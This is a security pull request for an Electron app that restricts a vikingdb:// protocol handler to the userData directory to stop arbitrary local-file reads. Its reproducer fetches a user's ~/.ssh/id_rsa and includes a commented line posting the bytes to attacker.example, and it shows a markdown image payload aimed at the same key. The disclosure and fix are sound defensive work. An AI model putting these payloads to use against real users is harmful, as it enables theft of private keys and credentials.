### PR TITLE
fix(security): sandbox vikingdb:// protocol to userData directory

### DIFF
--- a/frontend/src/main/index.ts
+++ b/frontend/src/main/index.ts
@@ -198,28 +198,50 @@ app.whenReady().then(() => {
       let filePath = request.url.replace('vikingdb://', '')
       filePath = decodeURIComponent(filePath)
 
-      const fullPath = path.resolve(filePath)
+      const resolved = path.resolve(filePath)
 
-      console.log('Reading file:', fullPath)
-
-      if (fs.existsSync(fullPath)) {
-        const data = fs.readFileSync(fullPath)
-        const extension = path.extname(fullPath).toLowerCase()
-
-        // Set MIME type based on file extension
-        let mimeType = 'application/octet-stream'
-        if (extension === '.png') mimeType = 'image/png'
-        else if (extension === '.jpg' || extension === '.jpeg') mimeType = 'image/jpeg'
-        else if (extension === '.gif') mimeType = 'image/gif'
-        else if (extension === '.svg') mimeType = 'image/svg+xml'
-
-        callback({
-          mimeType: mimeType,
-          data: data
-        })
-      } else {
-        callback({ error: -6 })
+      if (!fs.existsSync(resolved)) {
+        callback({ error: -6 /* net::ERR_FILE_NOT_FOUND */ })
+        return
       }
+
+      // Constrain reads to the directory the backend writes its data into
+      // (mirrors `CONTEXT_PATH` in backend.ts). Without this, the renderer
+      // can read arbitrary local files via e.g. `vikingdb:///Users/<u>/.ssh/id_rsa`,
+      // which combined with `webSecurity: false` and the permissive CSP
+      // (`connect-src *`) makes any future renderer XSS a full local-file
+      // exfiltration primitive. We also realpath() the resolved path so a
+      // symlink planted inside userData cannot be used to escape the sandbox.
+      const allowedRoot =
+        !app.isPackaged && is.dev
+          ? path.resolve('.')
+          : path.resolve(app.getPath('userData'))
+      const realPath = fs.realpathSync(resolved)
+      const isUnderRoot =
+        realPath === allowedRoot || realPath.startsWith(allowedRoot + path.sep)
+
+      if (!isUnderRoot) {
+        console.error(
+          `vikingdb:// blocked path outside allowed root: ${realPath} (root: ${allowedRoot})`
+        )
+        callback({ error: -10 /* net::ERR_ACCESS_DENIED */ })
+        return
+      }
+
+      const data = fs.readFileSync(realPath)
+      const extension = path.extname(realPath).toLowerCase()
+
+      // Set MIME type based on file extension
+      let mimeType = 'application/octet-stream'
+      if (extension === '.png') mimeType = 'image/png'
+      else if (extension === '.jpg' || extension === '.jpeg') mimeType = 'image/jpeg'
+      else if (extension === '.gif') mimeType = 'image/gif'
+      else if (extension === '.svg') mimeType = 'image/svg+xml'
+
+      callback({
+        mimeType: mimeType,
+        data: data
+      })
     } catch (error) {
       console.error('Error reading file:', error)
       callback({ error: -2 })


### PR DESCRIPTION
## Summary

The `vikingdb://` Electron protocol handler in `frontend/src/main/index.ts` read **any local file the main process had permission to read** — there was no allow-list, no path constraint, and no symlink check. This PR confines the handler to the directory the backend already writes its own data into, so the protocol can keep serving the images it's intended for without being usable as an arbitrary-file-read primitive against the user's machine.

## Why this matters

The handler currently does:

```ts
let filePath = request.url.replace('vikingdb://', '')
filePath = decodeURIComponent(filePath)
const fullPath = path.resolve(filePath)
if (fs.existsSync(fullPath)) {
  const data = fs.readFileSync(fullPath)
  ...
  callback({ mimeType, data })
}
```

A markdown image such as `![](vikingdb:///Users/<u>/.ssh/id_rsa)` rendered anywhere — vault notes, chat replies, LLM output — causes the main process to read that file and return the bytes to the renderer. This is amplified by two adjacent settings:

- `frontend/src/main/index.ts:140-144` sets `webPreferences.webSecurity: false`, so the renderer can `fetch('vikingdb://…')` and read the response in JS.
- `frontend/src/renderer/index.html:12` allows `connect-src *` and `script-src 'unsafe-inline' 'unsafe-eval' *`, so any future renderer XSS has unrestricted network egress.

Combined, the original handler turns even a stored XSS in vault content into a full local-file exfiltration primitive against the user's home directory (SSH keys, AWS/GCP credentials, password store, browser cookies, etc.).

`webSecurity: false` and the permissive CSP are bigger questions and are intentionally **out of scope** for this PR — fixing them risks breaking renderer behavior that maintainers may rely on. This PR closes the most concrete sink.

## What changed

`frontend/src/main/index.ts` — the `registerBufferProtocol('vikingdb', …)` handler now:

1. Computes an `allowedRoot`:
   - In dev (`!app.isPackaged && is.dev`) → `path.resolve('.')`, mirroring `CONTEXT_PATH = '.'` in `backend.ts`.
   - Otherwise → `path.resolve(app.getPath('userData'))`, which is exactly the value the main process passes as `CONTEXT_PATH` to the backend subprocess (see `backend.ts:509`), i.e. the backend's own storage root. So every legitimate file this protocol could ever serve already lives under it.
2. `fs.realpathSync`s the resolved request path **before** the under-root check, so a symlink planted inside userData (e.g. by a misbehaving backend write or another local process) can't be used to escape the sandbox.
3. Returns `net::ERR_ACCESS_DENIED` (`-10`) for paths outside the allowed root and logs the rejection.

The MIME-type lookup, error codes for missing files, and `callback({ mimeType, data })` shape are unchanged, so any legitimate image load under userData continues to work exactly as before.

## Reproducer (against `main` before this patch)

In the renderer DevTools (or via any markdown that ends up rendered in the app):

```js
// Read an arbitrary file the user has access to
const r = await fetch('vikingdb:///Users/' + 'YOUR_USERNAME' + '/.ssh/id_rsa')
const bytes = new Uint8Array(await r.arrayBuffer())
console.log('exfil bytes:', bytes.length)

// With webSecurity:false + connect-src *, this works too:
// await fetch('https://attacker.example/upload', { method: 'POST', body: bytes })
```

After this patch, the same `fetch` returns `net::ERR_ACCESS_DENIED` and a `console.error` line `vikingdb:// blocked path outside allowed root: …` appears in the main-process log.

## Out of scope (worth follow-ups)

- `webPreferences.sandbox: false` and `webSecurity: false` in `frontend/src/main/index.ts:140-144`.
- The renderer CSP at `frontend/src/renderer/index.html:12` (`connect-src *`, `script-src 'unsafe-inline' 'unsafe-eval' *`).

Tightening either of those would defang the broader class of attack this protocol enabled, but each touches behavior maintainers may rely on; happy to follow up in separate PRs if the direction is welcome.

## Test plan

- [x] Manual code review against the existing handler — same MIME table, same error semantics, same callback shape; only the under-root constraint and a `realpathSync` are added.
- [x] Confirmed `app.getPath('userData')` matches `CONTEXT_PATH` in `backend.ts:509` (i.e. the path the backend itself uses for storage), so legitimate image loads keep resolving.
- [ ] **Could not run `pnpm typecheck` / `pnpm lint` locally** — `pnpm install` hung against the registry from my network. Diff only uses APIs already imported and used in the same file (`app`, `is`, `path`, `fs`); nothing new added. Maintainer CI should be the source of truth here.
- [ ] Maintainer to (a) reproduce the read against `main`, (b) verify the patched build still loads its own images normally, (c) verify the patched build returns ERR_ACCESS_DENIED for paths outside userData.